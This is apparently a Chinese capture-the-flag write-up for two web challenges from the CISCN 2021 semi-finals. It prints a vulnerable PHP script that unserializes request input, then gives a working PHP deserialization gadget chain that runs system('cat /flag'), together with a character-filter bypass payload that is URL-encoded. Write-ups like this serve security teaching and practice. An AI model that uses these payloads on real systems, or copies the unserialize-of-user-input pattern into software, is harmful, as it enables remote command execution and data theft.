ciscn2021半决赛-华南赛区

ciscn2021半决赛-华南赛区

easy_seri

用16进制去绕过一个完全用不到的key,无用。后来想到通过静态调用得到demo.php源码。

// serialize() of a plain string records its byte length and contents.
$a = 'Test::getHint';
print serialize($a); // s:13:"Test::getHint";

微信图片_20210619202148

demo.php源码

<?php
class Fake{
// Magic setter: PHP invokes __set() for a write to a property this class does not
// declare (anything other than $firm / $test). $firm receives the property NAME and
// $test the assigned value. The property name is passed straight to unserialize() and
// the result is invoked as a callable, so the writer of the property name chooses
// which function runs; the only argument is the fixed string below.
public $firm;
public $test;
public function __set($firm,$test){
$test = "No,You can't"; // overwrites the assigned value; the caller's value is never used
$firm = unserialize($firm); // unserialize() of a caller-controlled string: builds any object/callable
call_user_func($firm,$test);
}
}
class Temp{
// __destruct() runs automatically when the object is freed; no explicit call is needed.
// $action is not declared on this class, so $this->action is a dynamic property that
// only has a value if the serialized data supplied one.
public $pri;
public $fin=1;
public function __destruct()
{
$a=$this->action; // undeclared property: value comes from the payload, if present
$this->pri->$a = $this->fin; // property write by variable name; when $pri is a Fake and $a is a name Fake does not declare, this calls Fake::__set($a, $fin)
}

}

class OwO{
// Holds a callable and a single argument; run() invokes the callable with it.
// Both properties are public, so a serialized OwO fully determines what run() executes.
public $fc;
public $args;
function run()
{
return ($this->fc)($this->args);
}
}
$d = $_GET['poc']; // untrusted: taken directly from the request
// unserialize() of untrusted input instantiates arbitrary declared classes and fires their
// magic methods (__destruct, __set, ...). The return value is discarded, so any Temp built
// here is freed immediately and its __destruct() runs at once. Mitigation: use json_decode()
// for data exchange, or at minimum unserialize($d, ['allowed_classes' => false]).
unserialize($d);
?>

明显是通过__destruct调用Fake中的__set,再动态调用OwO中的run;__destruct中的$a就是作为回调函数的数组$firm,数组的第一个值为OwO对象,第二个值为函数名run,即可动态调用run函数。构造Temp中的action变量,序列化后传入。

class Fake{
// Stub with the same name and properties as demo.php's Fake: serialize() records only
// class name and property values, so no methods are needed here.
public $firm ;
public $test ;
}
class Temp{
// Stub of demo.php's Temp. $action is declared here so that serialize() emits it;
// demo.php's Temp does not declare it and reads it as a dynamic property in __destruct().
public $pri;
public $fin ;
public $action;
}

class OwO{
// Stub of demo.php's OwO with the callable and argument set as property defaults,
// so they are carried in the serialized form.
public $fc = "system";
public $args = "cat /flag";
}

// Builds the serialized Temp described above: $pri is a Fake, $action is the serialized
// [OwO, 'run'] callable array that Fake::__set() will unserialize and invoke.
$fake = new Fake();
$temp = new Temp();
$o = new OwO();
//$c = array($o,'run');
//echo serialize($c); yields the string assigned to action below

$temp->action = 'a:2:{i:0;O:3:"OwO":2:{s:2:"fc";s:6:"system";s:4:"args";s:9:"cat /flag";}i:1;s:3:"run";}';

$temp->pri = $fake;
echo (serialize($temp));

//demo.php?poc=O:4:"Temp":3:{s:3:"pri";O:4:"Fake":2:{s:4:"firm";N;s:4:"test";N;}s:3:"fin";N;s:6:"action";s:87:"a:2:{i:0;O:3:"OwO":2:{s:2:"fc";s:6:"system";s:4:"args";s:9:"cat /flag";}i:1;s:3:"run";}";}

微信图片_20210619202212

magicchar

代码审计+构造字母绕过

1.可以控制的参数是yell。

2.只允许ascii32-ascii126的字符。

3.过滤了大写字母(除了W)和[等字符。

4.开启了数据缓冲区,out变量将数据缓冲区的内容读出。

5.out变量等于Wa4nn就可以打印flag。

过程:利用之前做题时保留的构造字母笔记,用黑名单之外的字符构造出了a、4和nn。

4:

(((4).(0)){0})

a:

(((((0/0).(0)){1})|(((-2).(1)){0})&(((1).(0)){0})))

nn:

(((((999**999).(1)){2})|((((4).(0)){0})&(((-1).(0)){0})))&((((0/0).(0)){1})|((((2).(0)){0})&((((-1).(0)){0})|(((999**999).(1)){1}))))|(((999**999).(1)){1})).(((((999**999).(1)){2})|((((4).(0)){0})&(((-1).(0)){0})))&((((0/0).(0)){1})|((((2).(0)){0})&((((-1).(0)){0})|(((999**999).(1)){1}))))|(((999**999).(1)){1}))

将W和a4nn拼接起来

W.(((((0/0).(0)){1})|(((-2).(1)){0})&(((1).(0)){0}))).(((4).(0)){0}).(((((999**999).(1)){2})|((((4).(0)){0})&(((-1).(0)){0})))&((((0/0).(0)){1})|((((2).(0)){0})&((((-1).(0)){0})|(((999**999).(1)){1}))))|(((999**999).(1)){1})).(((((999**999).(1)){2})|((((4).(0)){0})&(((-1).(0)){0})))&((((0/0).(0)){1})|((((2).(0)){0})&((((-1).(0)){0})|(((999**999).(1)){1}))))|(((999**999).(1)){1}))

再进行url编码构成payload

%57%2e%28%28%28%28%28%30%2f%30%29%2e%28%30%29%29%7b%31%7d%29%7c%28%28%28%2d%32%29%2e%28%31%29%29%7b%30%7d%29%26%28%28%28%31%29%2e%28%30%29%29%7b%30%7d%29%29%29%2e%28%28%28%34%29%2e%28%30%29%29%7b%30%7d%29%2e%28%28%28%28%28%39%39%39%2a%2a%39%39%39%29%2e%28%31%29%29%7b%32%7d%29%7c%28%28%28%28%34%29%2e%28%30%29%29%7b%30%7d%29%26%28%28%28%2d%31%29%2e%28%30%29%29%7b%30%7d%29%29%29%26%28%28%28%28%30%2f%30%29%2e%28%30%29%29%7b%31%7d%29%7c%28%28%28%28%32%29%2e%28%30%29%29%7b%30%7d%29%26%28%28%28%28%2d%31%29%2e%28%30%29%29%7b%30%7d%29%7c%28%28%28%39%39%39%2a%2a%39%39%39%29%2e%28%31%29%29%7b%31%7d%29%29%29%29%7c%28%28%28%39%39%39%2a%2a%39%39%39%29%2e%28%31%29%29%7b%31%7d%29%29%2e%28%28%28%28%28%39%39%39%2a%2a%39%39%39%29%2e%28%31%29%29%7b%32%7d%29%7c%28%28%28%28%34%29%2e%28%30%29%29%7b%30%7d%29%26%28%28%28%2d%31%29%2e%28%30%29%29%7b%30%7d%29%29%29%26%28%28%28%28%30%2f%30%29%2e%28%30%29%29%7b%31%7d%29%7c%28%28%28%28%32%29%2e%28%30%29%29%7b%30%7d%29%26%28%28%28%28%2d%31%29%2e%28%30%29%29%7b%30%7d%29%7c%28%28%28%39%39%39%2a%2a%39%39%39%29%2e%28%31%29%29%7b%31%7d%29%29%29%29%7c%28%28%28%39%39%39%2a%2a%39%39%39%29%2e%28%31%29%29%7b%31%7d%29%29

image-20210619180958754